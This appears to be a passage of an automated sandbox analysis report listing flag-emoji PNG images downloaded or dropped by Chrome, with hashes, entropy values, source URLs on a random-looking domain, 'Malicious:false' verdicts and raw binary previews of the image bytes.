*w.$i.$b...#.p...4tRNS......#-2;GMOX[`mmmmrz~...............................mS...SIDATx.............H.."_Z{...-..].y.,....%.......@..).,..M..G.K#R$....0.BF..../@.....|.G..:t..C...:t..C..w....RK.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4849
                                  Entropy (8bit):7.92474008824267
                                  Encrypted:false
                                  SSDEEP:96:hu9t8vUZIjSY2P1zX9Usuzd8+8l67mh7pH8wm+J:hu9jIjwXX90m9KwfJ
                                  MD5:AA45551FA752CD134121A6B33D9ABE1B
                                  SHA1:75647FEF8644E56BC4C602134CEEB7C01D2CCD9E
                                  SHA-256:404D8514FA3D68C5D81841B950BA1B5F191124B5B5935028FAF2C727C741849C
                                  SHA-512:ADF1C3C0002ED4DBF4699F6BB713AA108FAE43F1DF736FE6ACEDAE94DAB440CC5F22C8F0FF8009A2ABE1E4BC93DF1E45B77BF6E9D4EF2628110B0C63014AAE85
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ee-1f1f8.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.9\....*Qox..)P....#Jg|....y}..'Rfz........--.6k."Ldx.jz....x...4b..T`u..uum...#Nr..cy.M\w...."Hez.Ri..$Nl}..{{k...#M...APh_u.m~.n&&..G.,Ul..]s.9Mp.+U..G.....................................................................................................................................................||..|........xx{...kk....kk.aag...ll.__....WW.__h~..PP.UUV{._w..HH.dd.PP.EE.CC.GG\q.Sq..AA.??.;;.>>.==Sk..<<Gk..::.44.HH.66Kd....=d.Dc..33.66.,,.00C^.6_..**.--.))8[..%%.**@X..22.Z.6W..''&V.&V.&U.&U..$$%U....%T.,S.%T.$S.3Q..##.00"Q.. )P....!O.(L. M..M.!K........J.,Gw.G..G.. .E.....D..C..D..C..A..@..@..@..>y.?.q"".>..>..>.....<..<..:q.:x.;..:..8..8.|...8..6l.8..7..6..4y.4..4..1b.2..2..1..1~.0n.0../y./}.-X..{.,d.,s.)..*m.&T.#z.&b..t. L. V..G..cjD.....stRNS....."&468FL_bbbcfly.~~~...........................................................................................Zf<)...-IDATx..Mo$.y........p...Z...9..V.C`#..#.. H. ....\.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4765
                                  Entropy (8bit):7.838650543201864
                                  Encrypted:false
                                  SSDEEP:96:GsnR8YVzCDeSNO08Xkt7p74/r44th9bE3rl33hHxWzYnTkG1gRR:G672De30VOhE3tLW0wG1gRR
                                  MD5:22A0FE23A23438D6F7D912FAE6A32D58
                                  SHA1:86ABF7C0B813F06BD2243105149D6B95A5982FF5
                                  SHA-256:A9BF9035B8D8ED594F97F5125B709AE03B0315F629451B481CE39E4C80BA8EF3
                                  SHA-512:057015942CCF5A8A71FE02D0D8FB9AAB22C3CDE322127E1F22ADF696B148EFC9E2478FA33912846D0C11AC2AFE69A573B2ED0FD9FA8487BD51BE3146A9F923F3
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f9-1f1ed.png
                                  Preview:.PNG........IHDR.....................PLTEGpL./2.\^p...dgn...npm..n...BF.nq.....".+^l...aco...jmp.........qr|....H.&+.lop...BEm...oq.cfn...psm...gjt...qtn...QV.cgg....................................................................................................................................................................................................................................|........|..nr.......ps.`d.knr...fi.ad.TY.Z].cf._b.QVgw..WZ.^a.IN.Y\.JN.QU.AF.LP.SV.@E.:?.JNTi..BG.39.38.16.06.=A.AE.16.6;.+1.-3.*0.-2.49.'-.+0..3CY.. &.$*. &.%*.)..59. &.$).....#.',..$....!&...3M...........!&....#'.......D|&D....%C..."$B......."@............! >..;..............9.~......6.w......4.....2~y...0r.0|./y...o.........-g.-y|...*v.*].)sp...'}.&rg...$p."v."n. k..j..h..r..`..\..S..h..I..F..`..Z..C..,.....tRNS....$/9CSY^cccdjmwy~~~~~........................................................................................................................................................{./
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5357
                                  Entropy (8bit):7.935966169409658
                                  Encrypted:false
                                  SSDEEP:96:YsYLMFACmt3eIVreiTu0pUsmyTCPg8TE1nA/X5NYlsTgim3qthJTTqhehq+:LYLMFktOi6ksyTC5g1A/Xv1gim3qtzTf
                                  MD5:C090632200FB917389370FE59395A135
                                  SHA1:D3784B1A2D487DA80F495AD437220251B9E62E4F
                                  SHA-256:1EDEFD8658D380F67B0CFE321F48AA2DEEF4B209DEA960E7FAF35BCF1C6F1A1F
                                  SHA-512:B64F1F4DAC3F2C17D0EC1C71527707DA4E7022868564D3C3391E6E8CC4D4CF13E114BB82DFB097192906419708CDCC2B398EFFC5E9F178AA9BCBD3FBB47B4F9B
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLS)+.ux....kl....vx%...y{....JL.su.02....{}.qs....%(....su....}.KKKo...uw.......uw`ZZ....}.....vwY\\...t...qs.z|....}.....np....y{...VUV;::l..........A.....@.....=..A..C..?.....2..=..9.....7..-.....3..4..2.....D./.."......). .&..E.".$....C.'....(.I.,.wH....}1.fL.mo.or.hk.r'.i5.bf.^b.OT.fh.WL.Z^....UX.LQ.Z].e(.GL.\_.OS.KP.KO.JO.JN.SV.[^.JN.IM.MO.GL.DP.W/.FJ.?D.FJ.Y\.RU.DH.HK.>O.CGttt.>B.M1.AE.IN.8O.NQ.RU.?C.7;.=A.;@.@E.<<.DG.9>.1@.6;.*M.69.<+.6:eee.38.7<.FH.16.26.69.6:.03.*8.59.-1.<?..1..2.+/.#8.*..+..(..25.(,.&+.)-.&*.%).:<.%)....#).$(.././2./2./1.7:.#'...KKK.(+. #s02.&)BBB...3AAx!#...X-.z..444...T "...;'')))&&&.!"%%%#$$###"""@..!!! .#".............! ........................#......................................................z|.oq.bd.gi.uwl.....0tRNS....%)5<>PUUceewxz~...............................5....lIDATx..k........lv.....]..n...tJA.*B...XKKG.^P;C..v..S.v..'.x..J....8e.B...A......]Vv.l6..z.)..K6........d.....sN..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3862
                                  Entropy (8bit):7.882603105889187
                                  Encrypted:false
                                  SSDEEP:96:GRZ6f++xjy/+V4xOMOoWYLrmKvtsPJUpjDrESKtiNK:GRkfD2xbflrmKv0JODrESpw
                                  MD5:02DE05F59493AD53EE7171D7A3DFE640
                                  SHA1:1C2870AA1B346025DD4109F353FC4965267AB115
                                  SHA-256:18A78DBB2765FAA9EDF626E8526E4D5A14891227D72D32BBC80FA575E99C6EF0
                                  SHA-512:23B6EEBF161A08D9086498DAF7A71C90C978707893E434234E509AA2D1F9DC818C2CA536660B8EDB6EEFB24EDE0C97C6A6AC5D83943713C8A079062026851C21
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.~z_D$.ifU.d..Y8!.f.sjb..O;".s{..]] $Eznua..j..#....s{a...;.l.#.iyf..E6n.#.r{.j.<1.s{ta.d..n.#.s{P.v.=2.fta..=1.r{d..n.#.;/.i.n.r`..C7.s{c../h[n.#.;/.rz.i.m.ub...4..6..6..7..1..8..8..0..0.....P..9..,..0..+..)..(..<..&.5..%..I..#.4..!..!.n.J.;./...T. ..."...;.....j...%...U.;...&......d...;.........'...G..........\.%....P.>......@.>..$..........q@..!....qy.. d...lt.`A....fo]...ak.]g....Wb._gU.}.z..Q].KCD.{.KX.w..LYJ.v.DR.@K.q.5.sA.q.<L.9H.5E~k..4E.4EAwk*.n.4D.5A.3D.6F2}l.3D.2C.3C.2C.1B..E.0A.1B./@xd...m.0A..j..?.->)yf..i..i.,=..h.-=7pc.(C.2?.+<..>&vc.}f.$8.#F.|e.0=q^..{d.yc.zc..F.*:.yb.w`.q^.+9.v_..G*gY.t].q[.s\.(6.nZ.qZ.oY.nW.mW.lU.%2.kT.fS.jT.iS.hR.gP.#/.fO.]L.cN.XH. +.^J.[H.XD|.(.RB.P>r.%m.".G8.D5.?2.9-]..P....tRNS.....!,579@EPSUWZccdediq|~...................................................................................................................m...:IDATx...=..D.....<c...=.']....s
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4319
                                  Entropy (8bit):7.895133297283278
                                  Encrypted:false
                                  SSDEEP:96:kFQ7JPpPZVy9SKbsBaFwIcYETZHpgN3LR5sEAPQfL43:YaJPpRs97EADcbu5a+q
                                  MD5:8A607D98461F53B98D68D51AFA363A55
                                  SHA1:E7F9A7A842DAD318C369A9C6F1CE04ED9BBF683D
                                  SHA-256:108931580AF025093063BE3B9A5F0CCD77FF15746ECB195D7E134577A23740D7
                                  SHA-512:731084B167E00358752D57975A12555F5CC85768E8E23626C3841A8D46432D7B6D5D2A247B94E36DF0850C260869711CA9DB5215388ECC82BBA037C41C0195A2
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e9-1f1f0.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.6Eg.%....erd.!g.%...mzb...nyc. .HV.iu.....1.o}.,@Z.....k.'.co...y.0p..c...ftc.!.o}~~~.@Q`.....`o.jxl>Gh.&...]......p..cqe."...lz.q.f.$.n|.ao]...||.6I....................................................................................................................................................................................x.....w.....u..k..i{.o}....jy._s.Wp.ft.br.\n.ao.Uj.[j.Kd.Ug.Nd.Ve.F_.L_.;X.@Z.O_.E[.:U.HZ.>V.4Q.0O.0O.0N.1O./N.5P./N.@T./M./M.-L.-L.;Q.,K.,J.+I.,J.3L.*H.*H.(F.4K.(F.$E.*GxJS.&D.%C.*D.$B.-E."A.&B..>.!?.%@..=..<.%>..8..:..:..9..8..:..8..5..7.$;..6..9..4..5..1.&;..5..3..4..3..1..5../..0. 6../..0..2.....-..*..-..,..+.....1..+..1..*..)..)..&..+..(..(.....(..*..&...x.,..%.. ..'...q.*..#l.(..... |.!s."...h.!u..p..a..f..\..4.s.....tRNS......+36>IOV\ccfgfhhx}}~..............................................................................................................................IDATx..K.d.Y......VUW.<=..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4635
                                  Entropy (8bit):7.9237043539723775
                                  Encrypted:false
                                  SSDEEP:96:ZpF7h5yyjUmyqt5kdtUJQgBM2gfMrTyYtQYiEeBhyYXDT24qGN:ZppNIm/5kTwQgB+0GMiZ2A+4jN
                                  MD5:B3A4C9657B3955E0B1B7C7CBC48D6E8B
                                  SHA1:4B7337C860FEB04DA60CB3BA2A986B0B868C5C79
                                  SHA-256:641704349EC44EFE01305BD1CC96E9C22DDBA825E0D8F4881A053F6FF8E0D29E
                                  SHA-512:7BE063B7BD00221610FAE60F9FB113E76842DF74C6B24EF5406A79BEEFC5BDAA07B6D51A5DDC6800B023E0F3F40A050F4FC2F1A8C99EDBD9A20DFEC09B27B269
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f3f4-200d-2620-fe0f.png
                                  Preview:.PNG........IHDR.....................PLTEGpL......455......K?4...........................uuu............YVT............{xv............f`Y..................WQI......XXX.....................$$$.........iy.......999..................QQQ..................N^o......^WNbgjWQI............VQLB=8...688............fdbIE@............fff>O`6J]...............+--......................................................................................................................................................................................q..............}}}{{{xxxiy.uuurrspppnnnanzkkkSp.hhhfffccc```]]]J^pZZZaSU`THVVVAXpSSSPPP;SkMMMKKKIII?KTGGGS?@EEE/Ic1FZBBB@@@???>>>===<<<;;;:::999888777666555444333222111000///...---,,,+++***)))((('''&&&%%%$$$###"""!!! ....................................................,}G...itRNS...........#%*0299ACGHIQPPU[Z`deghoooy{z.................................................................G......dIDATx...o\ez..{.9s.m..qb...'$$..!!..R...ZU..h..J.....R.@..R.....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3977
                                  Entropy (8bit):7.798239618187543
                                  Encrypted:false
                                  SSDEEP:96:hbxff0LNVueCDg4WTPKQ2SOcAQCYdwFHxBgHb:hdHc4gbKQ2S71Gy7
                                  MD5:934DA7C7C1EC30EE9E92ED392BD17CED
                                  SHA1:4CCEC57E8F6A19851DF4E1D589C0FABAAD49AA18
                                  SHA-256:161D4F9E853195BBC85BEFBC23949DEBDDED5B832B4733C72D4756352102230B
                                  SHA-512:01B4C4900FA92F5AF080CC05B70B743591D2D0B70EE7227BFD3C1012AA08DECA970E8B3DE14792ABB223173F8C8178F22A6FC0C53684911B1BFEA29384400132
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1fc.png
                                  Preview:.PNG........IHDR.....................PLTEGpLaSF.oXRB#E(..c.r.jr.R,e...S-.f.dlb....#w.,.o?.r.U.c...hr..gu...4=.R,.rd...jr.T-.i.iq.X2b...H".sa...V/.m.kr.W0.t.K&.4>..`.....2..3../..8..7..7..6..5..2..6..7..3..C..7..2..A..1..K..0..6..T..,..,..H..Y..'..>..'..].....A..$..f.b..!.q.Q.h...#..A.2.!...j...#...C...V...$.../..e.3..F...O.:...3.M...._.?.%....O...#..N.."..M..&h.Q..(..!K.Y..!..!|.6S.G.hq[.1&.c&.c&.b$.b.bj#.a$.a#.`$._!.^.Zd .].._..f!.]..[#.Z.X`..Y?.5.NZ!.X..W..e..TL.Q.NW..Q..T.CQ..O..P..L.AL..L.6F..I..I..G..J.5C..J.BK.*;..D.':.":.(:.):.+;..F..A.'9.|G.2@..@.&7.}D..2..?.$5.%6. ;..=.#4..=.wB..<.#4.(6..<.!2.}>."2..0.r?.o?....x9..*..+. /..+.i;..'.q5..)..(..'..,.j5..%.a7..$..'..".d0..!.[3..!..)..%.. ....Y+.T-........!t.!.N&.......H"k..z..u..i..c..Q..]..>..-.........H......tRNS....,08;?@OS[`cccfltw{~............................................................................................................................................................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4551
                                  Entropy (8bit):7.917027173476892
                                  Encrypted:false
                                  SSDEEP:96:lDg14cjYQrOXiVzOaa3wV6o0mVop8P+QF30TLycPdpZV:lM4cjYQ+MzOZ3QDoePbF30T2idl
                                  MD5:0BEB58FB2D56F059D82DEF815F9477AF
                                  SHA1:B7E7F3B02BACB71C749A90E3AA0BBDC32DC27468
                                  SHA-256:407965CD3F2162E12953E9C3EB7B1E7759108ED018241413F70CB531BF0886A9
                                  SHA-512:4ABADF0BA731EC9861589F460E2104F3A305A1B24A312EE09C094DF4AC487978BF52250DE32C9A607505A230A73157C774802EF064BB84FC598FA297DB435A9B
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1eb-1f1f2.png
                                  Preview:.PNG........IHDR.....................PLTEGpLh.....B\n...p..B]n...A[m...9Se...B]o@[m...e.....@[l...Mk.q..Z|.@[l...;VhTu.De|`~....?Zl...C^o...<Wiv.....Gbs......:Uf...Hcu;Vh......Fasp.....8SdGbt......E`s8Se..............................................................................................................................................................{....}....}..|..|....|..x..z..}..{..y.......x..{..y..|..w..w.......v..z..v..v....t..}..t..s..v....x..s..}..r..s..q....s..p..r..v..p..r.....o..q..y..n..|..n..m..m..p..m..m..l..s..l..}..o..k..n..j..j..i..i..o..h..i..g..h..g..h..w..i..l..f..f..e..e..k..e..d..c..d..d..c..g..b..p..b..`..h..`..a..c..]..c..\..a..\.._..[..W..]..[..V..Y~.Z}.X{.Ux.Ow.Tt.Ou.Pq.Nn.Mk.Gl.Fk.Li|IfzDg~HdwDe|Dat?\o<Yl:Vi7RdZ.k....itRNS........#++44ABHOS]acbirw~~.................................................................................^....IDATx...M.......}....n$...Y..Av.....9@N.]...\ .,s..$...o...+.R.D.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3597
                                  Entropy (8bit):7.8222571303237
                                  Encrypted:false
                                  SSDEEP:96:Nx6wk8gdhc/UGCfl0YsyYXHd2+Cx4NlE4X7yrVf2ctJ7:L6wAhc/3CfHstXsPox7yrEcH7
                                  MD5:B214FB33DF8EF10C3F6D725E550AB8C0
                                  SHA1:DE60901B305C9B5587A3A9FC91F1794EF836CA67
                                  SHA-256:DC1913ADA04169A23DB8B88EF0D485E053327F2179DAC907B0D40ED9032F34EB
                                  SHA-512:7219016D55FAE7187100FB4949BE0CB999010CB562E89A8A518BEB0CA92BF4CEEF21ECEDC2191C55A93AD014D62BEED7CC92BE6863AC55D772699E655BD2D821
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.....s_A.T.t}..]D...Wb......a.../F#eD.x....]_..._....q;..L/.....a.L/....H..Z7..bc........r>..M1...H.p..^e......M1r=..........c......M2..c.I....t?.....L0...a..t>....6.b..\............................................................................................................................>.?....h......M.*...].A.4.....................!.G.......R.3.~..~..}....d...{...C.}#.z..y..z.....|..w..v..v..w.]...u..t..z9....s..u..s..r..q..p.L.}.q.B.|U.}.n.0.z.o..m..m..l./.x.l..k.E.x.j..p+.j..l..i.6.u.h.J.u*.p.h.=.q..n.c...l..kA.l..j..i-.j..h..g..f.`...f.]...f._...d&.d..b..c..c..c..b.[...a..`.._..^..^&._..\..\..[..[.T...[..Z..Y..X+yZ..V.Q...U..U..T..T..S.|T..R..Q..Q.K...O..N.qN.H..G..{L.uK.yJ~D.yC..sF.mFx?..aB.hAq;..d@.`=.]9.W9.Z6.W5.P4.R3.M0.I,.*.....tRNS.....%-.9::;@NSV`cdedgqwyz~....................................................................................................................................................`eZ.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):3832
                                  Entropy (8bit):7.874579251474878
                                  Encrypted:false
                                  SSDEEP:96:zYsPa1xTcgZgeTDifcckzhHOXt713xNKgGLL8:cQa1VcgZgeCfcDhu9J3ygSI
                                  MD5:4B32879653C41A7987AF3DB216562388
                                  SHA1:D4DA6392FC0DB79B7A8A90BABE7BEE204E4380E2
                                  SHA-256:C25A8861FAC6A81117E7E448288F7EE2ADCF5B0C61B95DB254957BAC38B3E8CC
                                  SHA-512:8F1720CFA040F0DDEDF7C76C5CDBDB549A88A0D7166E13477FBD39E22616A4B700E5E7FDD6B7561D23DEBDB6FFC83680D7F8DBDB8F13D633E63DF7215DE5D997
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f0-1f1fc.png
                                  Preview:.PNG........IHDR.....................PLTEGpLw<;n..k. h..u.!q..u. u.!j..@.w...%vc..0t..u.!_..h..|$'s........w!#p..o..Dthv #l..o..|%(t..p..i..~%(m..p..{$'t. ///u..e..{$'n...................................................................................................................................{........y.....Y....i..s.....o...nrf..]..U..i..L...ps\..g..L..C..;..d..:..P..?..9..Y..9...[_9..@..+..7..5.....6..\..I..._c4..2..>..P..2..0...np@..'..R../..-...JO.JNC..,...IM4......GL*...HM.lm"...FK.QU<.~'..3...EJ.CH.BG.EI.=B...$.~.AF&.|.?DC.v!.{).z.>C.AE..x.<@.5;'.u.?C..v.9>..s..s.=A.6;./4..q.7;..p.39.49&.k..n.:?.16..m.38.59.-2..3.'-.7;!{e.37.*/..f.-1"ta.(-.48.15.%*.',.+/.$).14.."..#.*...1.#(.,/."&....*-.$(..".WI.'*.#&~%(...| #...u. *;7r..k..S...(%<.."..............................................m....+tRNS....$+8>OTUccceekvwz~......................DgA...|IDATx...[.$.]...s...'k.;v.........8XX.W.=/.../..$$.EBX....H.V.1X.!..8.].zO3....Pl........D....fw.....<.F#...x.W<-...O.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4259
                                  Entropy (8bit):7.935066175922985
                                  Encrypted:false
                                  SSDEEP:96:mO/AKTMhjlFU/SoSqHArjdM4OZxK6HNekkDXzhqHA6kEmfX0XscTf:mO/y5U/ZAdvOlpkDDhqRkEmfQsq
                                  MD5:E92468B68A0F8C1E6F11C0B05F9E9E28
                                  SHA1:5E0E3EE5F0FC748B9940E9F860104DDDC4A90FF0
                                  SHA-256:8D2AEE59787A113845F8B2F0D48CB8AEF2F28817FD54126FEFB4E2899406AE90
                                  SHA-512:54C37A69118EDC56508A0B8358E7C168D8FF2DE399A0194CBA1FA8F4BD626601C7A5AD0F17CB44105A51314C3D84F9EA2ACCD6497B66B0E07F10A88A2B676678
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1ec-1f1ed.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.di.7&.ck.;'.nu.;'.:'.ck..#..,.R7.lq..:.:%.y...$v...=%t...hp.64.pw.;'.ks.Ya.;(.rz.ip.5!.fn.A-.px.rz.=).dl.3 .ow.=G..:..:..9..6..5..5..7..8..+..-..7..5..'..3..2..0..#.....-..,.....#..+..*..(..'..#..%..6..#.....!.. ........:.7.!."...........%.8......<...4...%.....%.'.....(.6....A..%.....,.#..".q3..#.owp.I....hp.bk..+.[f.\0.bj.R@r.%.T`.|..[dQ.N.w,.MZ.Zb.w..Q\.FT.P&.S\.KVQ.7.>L:.S.>L.KU.BOwj).7G.U..4D.3D.3C.>%.0A.?K&.Z.1A%.Z..?.6D%~Y#~X.)E$}X.,="|Vk^+.+;"{U7v5Fo+.,;.yS.(9.!F.xR.2@.vP.x\.%6.+7.tO.$5..? pM`V)."2.rL.*8.&2.pJ.s^..0.jJ. 0.!/.mH./6..-..9."1.fG.kE.nU..+.gD.iD..).gA.bC."...)..'.^BOH(.e?.....%.c=.\=.Y=..".`;._G..*.^9.....%.U9.]7.R8.[6.....(.Z5.X4?:'.L4..".S3....G0.M/....C..F*0.&z...>).A't..u...=$.:$%%%r...6 .2...$..#..#.."AC.....'tRNS...%*8ASTcccfgg~~~~~..........................+IDATx..Y.d.].....t..=..C.N,...;..QBDLl .,.`.%F......HH 9O...%..!.4...-.....`..Ld..c.g..{..n-...Zf.h?......_.~...J.nV.X.b.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5631
                                  Entropy (8bit):7.8534733574544076
                                  Encrypted:false
                                  SSDEEP:96:UjLdLKzOa4e/FZYvbjDh7WxEhj0DTC5Rchb6qhVOBuS2UeH7isjRcl+b7:UjLdWzOEFZYS6AQaOc35RU+f
                                  MD5:AD4EE8AE80598025099AA142E0AD4F64
                                  SHA1:E67F75684806B6A658235FF7B57B7B3F7E3714F3
                                  SHA-256:BD693101377416A86A9BF621295A118A72DE2624EFFAD92EB960231FA76E2B84
                                  SHA-512:20571AD6CD0C3A8C0DCB840E8797956B3F8AA56B12F533CCC833898A6836277BD648358E279C606D7B20F6BC3C7E5DB30AC18EC3C8C56227D0DA44C61F30814C
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.\}.[}._..k..w..~...................................................................... ....A].........r..IuA...4..!..9..9..+S.....q.........]......%..&..%..%..$..$..#..#..&..!...........T....a/..U..O...6.j;..@.]9.=;.8..6..6.N;..5..8.6..*../.....3..4..8.}8..A.'@.4A.2@.0>..<.,9.(6.%3.!/..+..(..&..$.."..!..................u..c..o...N?...q..h..f....f]..]..b..."+. &. +. ,.++..%.i!..-.Q$.}4....=". ..................|..o.{a.{e%.}.../k..f..q..h..l..h..f..j..b..g..Z..K..B..:..1..*..4..=..I..^..W..K..9..#........".. ..1..A.........^.....".. ..%..)..,.....K..\.7.-....D.........8...........l.w.........,...{.Qg8.].:xmb.e.{..t..p...'.-6.<F.JT.U\.cg.ci.ah<..<..,|..r..c..Jd.Xr.Vh.Tp.Vp)Tk.Pi.Ld1Xb.Uo.Kf.Ql.Ws.]w.b..m..h..{.......................u..r..s.K.s.....tRNS.~..............................................................................................................}/).....d......................~b.d<.............................
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3907
                                  Entropy (8bit):7.844271049362917
                                  Encrypted:false
                                  SSDEEP:96:JZClYrCj5cKU9CF33hrljn27uq6mU1bQ/kXIkiiQ95XySgN:J8+2j5nrHh9qMmU1bQrkK9dySi
                                  MD5:0163625DC285971BCE7C7410422CE1C3
                                  SHA1:7041234769524731835CECAA906E54F31E38406C
                                  SHA-256:3AA84C202F45344DD9CAE5EAD289D10654867413C3A481F65466E6F07845C5A6
                                  SHA-512:7105F7727A9C4908E19124068BB6F593BD8565F6A473D041BA6114A443676FDC11238A7798B81E1ED5C5522A683CE976E02DF23EE46C3B872512B7202B7B58E8
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.^B.]T~I..V2|N..hh.gg|O..[[|O..k......w.....~.ii.PP{M..cc.V........._..q.,,rE..T..hh~Q..aaxJ..W..jjxJ.uG..aa.T..Y.zM..W..//.kk.]]uH............%..%.....$..$..$.."..... ..$...........$..........$...................<....................K...~..ii.~..|..}..cc.w..x..r<.YY.t..q&.__.t..ZZ.RR.q..p..[[.JJ.kE.n..l..KK.SS.@@.k..MM.dh.BB.OO.88.f..f..CC.HH.00.b..77.BB.`..**.&&.Y4.%".%%.&&.77.$..+-.$$.##.\..Z..!!.""....::.))....X....jO..V..... .#4oMt.U........'(....Q..........}N... ....!L.**.........mDHzJ................tF.."h......N<......................W6]...h"..........@..........E......&&.8!.%%....##."".8%i.#.E.. .....%.j.Ty.6.................................(................y...;.h...............................................}..q..c^O.C...xtRNS....$15@EU_cccccenp~~~~~~...............................................................................................-a....zIDATx....o.i^....y.zm..8..h...A;..q...9p..+...@.@
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):6092
                                  Entropy (8bit):7.94313727917092
                                  Encrypted:false
                                  SSDEEP:96:0p2suKmK4hhPuIiSXqYiesgnN7eCWru2/v7o4udZMmJhtUWcEpAYuBKOOcok57Ub:0p2hKmK4hh2IidY3sitbk/nudZeWcEyE
                                  MD5:70C52F8CA971597F47309C4AF60CA93C
                                  SHA1:EB8C691CF126ADC4D5C38F69CF5A5C0E91028F83
                                  SHA-256:1A45624971840A7096188818964EC57B18AFF044F52D666466527B81FAACB911
                                  SHA-512:70C366E7B949AA9E61612C05BF9A50DE8D55B3C2DCCDAF3440F3D5F90DE52E97A016578EB275DD0F4C40954D5E56F1C1D02689E0B759509EB2D05FAFCE4207FE
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1e8-1f1f0.png
                                  Preview:.PNG........IHDR.....................PLTEGpL..L..7..;VQv..5.DCqk....kg.IDj..6..7..5of......1..5..6..6mj.md......6..:gd......6ma....pm.`]......&a^..KJkd....SOv.gr.ej.r.......{<P2&w0$u..Q..O1%v..O..U.....W$.i0%t.._..T..R).m..Y'.l*.o..b..c..Y&.k.#s..M-!r..\..., p..H.&%.../$r..J..]..S..:..?..5..?..a..v.....-%%{&&}..C......""y.....Q..f..K.....F....""........<....._.##.....F.....c.....`%.Z........8........j..]...../..X.00.....P......".S**w..o...xu......9.AA........p........g...............33..Q...32.......b`....................>>.%)..3....|.SN..................xx....`_.(*........(,.~.............LL......ZX..ll............TS...)%w.1....p.Jc..).c6/jc_.[W.>8{$.`FB|.\Z*!iKD.C<rPJ./&f<2yOIy.ON......._nk.,([3*kjg....%.h..5't....#oVP...Z<5n`\.JDt8-xC=.".g......VR|..V........ .Z..\.._.......ed.ss .^ .e..q....-tRNS.c.....8...../d~.fB..}.vP...R.....~$e~..~....Z....NIDATx^...N.@..QP,Y.bV1".r..@.......{....#$.]...=.w...lm.B.!..B.!..Bv.U.k.1M.\W.#eS..K.Z..L...T:.....0....uY....tB...w5...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4220
                                  Entropy (8bit):7.941445865022613
                                  Encrypted:false
                                  SSDEEP:96:zE1YN8kg9FTvbNJ08LgzKget/YDrDpnlHtrG6m:zZNO5jnBgzKgK/CrPm
                                  MD5:B4A2F45E07D6B2BCD68BC4F0549F5A60
                                  SHA1:63C3C8A89C64FBB5E07EF97176A2C8127D30324E
                                  SHA-256:1F69E9FA9DBA9AC606E21B52D153E8C38B73B9E97E33AF84A0394FFCC48E7BC5
                                  SHA-512:B378B54C12942422D7A8EC95FEDC5CC098AADDD8E54F9F6A1877A3C68701966EE7B3B5B6F24A3FE478C64476F0F89E0959209F2243CC70A73EE968B58B6BCCCB
                                  Malicious:false
                                  Reputation:low
